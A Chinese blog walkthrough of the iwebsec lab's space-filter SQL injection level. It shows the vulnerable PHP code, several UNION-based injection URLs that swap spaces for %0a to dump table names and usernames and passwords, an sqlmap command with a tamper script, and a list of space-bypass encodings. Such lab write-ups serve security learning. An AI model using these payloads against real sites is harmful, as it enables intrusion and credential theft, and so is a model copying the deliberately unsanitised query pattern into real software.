iwebsec sql-空格过滤

最新推荐文章于 2024-11-05 14:55:45 发布
最新推荐文章于 2024-11-05 14:55:45 发布
阅读量329 收藏
点赞数 11
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Enrich_Life/article/details/134268420
版权

07-空格过滤

打开如下:

在这里插入图片描述

代码分析:

<?php
  if(isset($_GET['id'])){
	if (preg_match('/ /', $_GET["id"])) {
		die("ERROR");
	}else{
		$id=$_GET['id'];
		$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
		$result=mysql_query($sql);
	}
  }else{
		exit();
	}
	if ($result) {
		?>
		<table class='table table-striped'>
      <tr><th>id</th><th>name</th><th>age</th></tr>
		<?php
		while ($row = mysql_fetch_assoc($result)) {
			echo "<tr>";
    			echo "<td>".$row['id']."</td>";
    			echo "<td>".$row['username']."</td>";
    			echo "<td>".$row['password']."</td>";
			echo "</tr>";
		}
		echo "</table>";
	}
	else
	{
//	echo '<font color= "#FFFFFF">';
	print_r(mysql_error());
//	echo "</font>";
	}

?>

preg_match 函数正则匹配了空格,我们可以用 %0a 新建一行绕过

在这里插入图片描述

构造注入语句:

http://localhost:8050/sqli/07.php?id=1%0aunion%0aselect%0a1,2,database()%23 #数据库名

http://localhost:8050/sqli/07.php?id=1%0aunion%0aselect%0a1,2,(select%0agroup_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database())%23 #全部表

http://localhost:8050/sqli/07.php?id=1%0aunion%0aselect%0a1,2,(select%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name=%27sqli%27)%23 #sqli表的全部字段

http://localhost:8050/sqli/07.php?id=1%0aunion%0aselect%0a1,2,(select%0agroup_concat(username,password)%0afrom%0aiwebsec.sqli)%23 #sqli表全部字段内容

使用 sqlmap:

sqlmap -u 'http://localhost:8050/sqli/04.php?id=1' --dbs --tamper "space2comment.py" --batch

多种绕过空格分法:

  1. %09 TAB键(水平)
  2. %0a 新建一行
  3. %0c 新的一页
  4. %0d return 功能
  5. %a0 空格
  6. /**/ 多行注释
正在努力…
关注
iwebsec靶场 XXE关卡通关笔记
mooyuan的博客
11-04 1730
iwebsec靶场xxe关卡通关笔记XML外部实体注入简称XXE漏洞。XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义,文档元素。内部声明是直接在XML文件内部声明的,对于安全人员来说基本没用。外部声明是引用XML以外的文件,有风险。外部实体注入可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等等。
CTF学习笔记9:iwebsec-SQL注入漏洞-07-空格过滤绕过
lvx++的博客
01-23 1452
一、直接上payload ?id=-1%0aunion%a0select%0a1,2,group_concat(concat(username,0x7e,password))/**/from(iwebsec.users) 二、以上用到了多种绕过空格的方法 %a0 %0a /**/ ()
iwebsec靶场 SQL注入漏洞通关笔记7- 空格过滤绕过
mooyuan的博客
11-27 1499
打开靶场,url为iwebsec靶场 SQL注入漏洞通关笔记7- 空格过滤绕过(1)闭合方式是什么?iwebsec的第7关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功(3)是否过滤了关键字?很明显通过源码,iwebsec的第07关卡过滤空格
iwebsec--sql注入漏洞
追求卓越,技术流~
11-20 1846
sql注入漏洞
iwebsec靶场通关sql注入详解
m0_51090949的博客
07-12 1379
iwebsec靶场,sql注入通关,详细教程。
iwebsec sql注入篇(详细过程,完结)
qq_60829702的博客
03-19 2494
iwebsec靶场,SQL注入篇,详细过程,全篇完结
iwebsec靶场(sql注入)
果粒程
02-24 1193
iwebsec靶场(sql注入)
sql-map-2.dtd和sql-map-config-2.dtd
06-10
本文将深入探讨与“sql-map-2.dtd”和“sql-map-config-2.dtd”相关的知识点,以及它们在Ibatis中的作用。 Ibatis是一个轻量级的ORM(对象关系映射)框架,它允许开发者将SQL语句直接写在配置文件中,通过XML映射...
sql注入空格过滤_SQL注入:各种绕过检测的姿势
weixin_39874589的博客
11-16 4304
这一篇主要总结一下sqlilabs中advanced injection中的用到的各种绕过,也就是less21-less38。目录1)数据编码2)特殊字符、语法关键字过滤3)存储型注入4)特殊字符转义与宽字节注入5)防火墙保护与http参数污染数据编码http://111.231.88.117/sqli_lab/sqli-labs-php7/Less-21/ http://111.231.88.1...
sql注入-绕过过滤空格
MichealCurry1的博客
10-09 3005
空格可以用/**/,%20替换
Flink SQL-Client探索
兴趣使然的的码农
05-07 7054
Flink SQL-Client探索 SQL-Client 就是一个便于大家学习和写 demo 的一个 Flink-SQL 工具,这次文章的基本流程还是根据社区云邪大佬的公开课,和 官方 wiki 的步骤执行的,这里就大体自己捣鼓了一遍记录一下。 前提准备 从 GitHub 上 clone ververica/sql-training 的 Docker 镜像 地址为:https://git...
Sql-labs 第一关超详细讲解
A9874564的博客
02-21 6147
一.Sql注入含义 所谓的sql注入就是通过某种方式将恶意的sql代码添加到输入参数中,然后传递到sql服务器使其解析并执行的一种攻击手法。 二.注入思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三.判断是否存在注入点 ...
SQL 常用更新操作
Fisher3652的博客
11-05 126
SQL 常用更新操作
Flink SQL
最新发布
qq_41081716的博客
11-05 189
以上步骤展示了如何使用 Flink SQL 从 Kafka 读取数据、进行聚合计算,并将结果分别写入 MySQL 和 HDFS。这是一个基本的流程,根据实际需求,可以调整表结构、连接器配置以及 SQL 查询以适应不同的应用场景。
PostgreSQL 时间函数操作
云端的博客
10-31 157
PostgreSQL 时间函数操作
SQL50】day 1
m0_73629042的博客
11-05 233
使用不等于符号无法筛选null情况。
SQL实战进阶】——视图的定义、使用
jd1813346972的博客
11-02 1021
该篇文章主要利用15个案例帮助读者快速掌握SQL的视图相关用法,涉及视图的创建、删除、更新、更改等等。
使用PostgreSQL进行高效数据管理
qq_36287830的博客
11-01 1140
PostgreSQL是一个开源的关系型数据库管理系统,以其可靠性和强大的功能而著称。它支持SQL标准,并提供了许多高级功能,如事务完整性、多版本并发控制(MVCC)、复杂查询、外键、触发器、视图、事务等。通过本文,你已经学习了如何使用PostgreSQL进行高效的数据管理。我们介绍了PostgreSQL的基本概念、安装方法、配置PostgreSQL、基本操作、性能优化、备份和恢复、高级特性(分区表、全文搜索、地理空间数据)、监控和日志、故障排除等内容。
第三十三章:docker 启动mysql web管理工具- MyWebSQL
RodJohnsonDoctor的专栏
11-02 179
MyWebSQL 是一个基于 Web数据库管理工具,它允许用户通过浏览器管理 MySQL 数据库。优势跨平台性:MyWebSQL 作为一个 Web 应用,可以在任何有浏览器的环境中使用,这提供了比传统桌面应用程序更好的跨平台能力 20。简易安装:MyWebSQL 的安装过程非常简单,只需下载并解压到 Web 服务器的文件夹中,无需复杂的配置 20。开源免费:MyWebSQL 是完全开源的软件,这意味着用户可以免费使用,并根据自己的需要进行修改和定制
JAVA与SQL-Server图书管理系统设计与开发报告
本篇文档是关于《数据库原理与应用》课程设计的报告,主题是基于Java和SQL Server的图书管理系统设计与开发。这份报告由一名学生在20XX年11月30日至12月18日期间完成,针对的是计算机科学与工程专业的学生。设计任务...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值